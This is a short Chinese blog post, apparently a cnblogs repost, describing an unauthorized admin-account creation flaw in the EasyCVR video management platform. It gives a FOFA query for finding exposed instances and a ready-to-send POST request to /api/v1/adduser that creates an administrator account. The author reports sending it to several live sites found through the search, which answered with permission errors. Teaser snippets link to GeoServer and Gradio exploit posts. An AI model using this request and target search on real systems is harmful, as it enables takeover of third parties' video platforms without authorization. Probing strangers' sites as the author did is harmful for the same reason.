首页 > 其他分享 >EasyCVR视频管理平台存在任意用户添加漏洞

EasyCVR视频管理平台存在任意用户添加漏洞

时间:2024-05-25 19:44:53浏览次数:21  
标签:视频 adduser xxx EasyCVR 漏洞 添加

漏洞描述

攻击者可以通过发送特定的POST请求,利用未授权访问的接口'/api/v1/adduser',在系统中添加任意用户,并将其设置为管理员角色。

fofa

app="EasyCVR-视频管理平台"

poc

password为md5加密

POST /api/v1/adduser HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

漏洞复现

fofa中搜索资产,共有493条数据匹配

image-20240525183329277

访问目标网站进行抓包

image-20240525183406680

image-20240525192843522

构造数据包之后,返回的内容是没有权限操作,目标做了鉴权或者系统为最新版本,已无该漏洞

一连找了好多个站点,均返回没有权限操作

标签:视频,adduser,xxx,EasyCVR,漏洞,添加
From: https://www.cnblogs.com/LeouMaster/p/18212927

相关文章

  • GeoServer系统wms接口存在远程命令执行漏洞
    漏洞描述该漏洞存在于GeoServer系统的/goserver/wms接口处,攻击者可以利用该漏洞在xml中包含恶意的代码执行任意系统命令,漏洞利用了GeoServer处理WebProcessingService请求时没有正确过滤用户输入,从而导致远程命令执行漏洞。fofaicon_hash="97540678"pocPOST/geoserver/wms......
  • Gradio存在任意文件读取漏洞(CVE-2024-1561)
    漏洞描述该漏洞是Gradio应用中的一个高危漏洞,其出现在'component_server'端点,允许攻击者调用'Component'类的任意方法,并利用'Block'类的'move_resource_to_block_cache()'方法在文件系统上复制任意文件到临时目录,随后可将其检索。这是的攻击者能够在未经授权的情况下读取本地文件......
  • 【爬虫软件】用Python开发的抖音关键词搜索工具,可筛选爬取热门视频、最新视频等
    一、背景介绍1.1爬取目标用python开发的爬虫采集软件,可自动按关键词抓取抖音视频数据。为什么有了源码还开发界面软件呢?方便不懂编程代码的小白用户使用,无需安装python,无需改代码,双击打开即用!软件界面截图:爬取结果截图:结果截图1:结果截图2:结果截图3:以上。1.2演......
  • AIGC落地培训行业最后一公里,有言AIGC视频生成产品赋能培训行业实现降本提效
    近年来,随着疫情之下外部环境骤变,市场竞争日益激烈。而在当下,如何让企业培训降本增效,最大化发挥价值成为培训人的共识。技术的进步,不仅仅是文生文、文生图的简单应用,文生视频工具的问世,解决了困扰培训行业多年的难题。而在当下,有言以AIGC视频生成产品赋能培训降本增效,已经广泛......
  • 视频文案交稿难?让有言“文生文”帮你搞定一切!
    产品种草文案怎么写才能让用户买买买?搜集资料太耗时,如何一键生成专业知识?业务培训变得更加生动有趣的秘诀?还有大型活动主持稿、致辞....光是想到要准备这么多文案就快头秃......
  • 推荐一款全新的4K视频处理转换工具:VideoProc Converter AI
    VideoProc(4K视频处理转换工具)是一款可以帮助用户对视频进行格式转换,画面编辑,甚至还可以支持网站下载视频,录制桌面屏幕等,是一款名副其实的多媒体编辑全家桶神器。软件特点作为功​​能强大的继任者,VideoProc集成了UHD视频转换器/压缩器(You*Tube)视频下载器和视频编辑器,使......
  • [SCTF 2021]loginme go语言ssti漏洞
    今天做个新颖的题,go中的ssti问题。进来点击访问/admin/index?id=1发现空白,只有admin能看,看看源码main.go。点击查看代码packagemainimport( "html/template" "loginme/middleware" "loginme/route" "loginme/templates" "github.com/gin-gonic/gin&quo......
  • 视频号直播间自动回复评论插件-循环发送话术-视频号直播机器人
    在使用视频号直播的时候,我们可以登录到视频号直播中控台,利用我开发的插件实现自动回复评论和循环发送评论原理:MutationObserver机制MouseEvent事件和dispatchEvent使用方法:开启直播后,登录到视频号直播后台https://channels.weixin.qq.com/platform/live/home开启插件:点击......
  • 一对一视频源码,异步中出现了异常该如何处理?
    一对一视频源码,异步中出现了异常该如何处理?js本质上是同步的,是一种单线程语言。诸如浏览器引擎之类的宿主环境使用许多WebAPI,增强了js以与外部系统进行交互并处理与I/O绑定的操作。浏览器中异步操作有:定时器相关的函数、事件、Ajax请求和Promise等。一、定时器的错误处理......
  • ffmpeg显示视频信息
    方式1:通过命令获取ffprobe../input.mp4方式2:代码获取main.c#include"libavutil/log.h"#include"libavformat/avformat.h"intmain(intargc,char**argv){av_log_set_level(AV_LOG_DEBUG);if(argc<2){av_log(NULL,AV_LOG_ERROR,......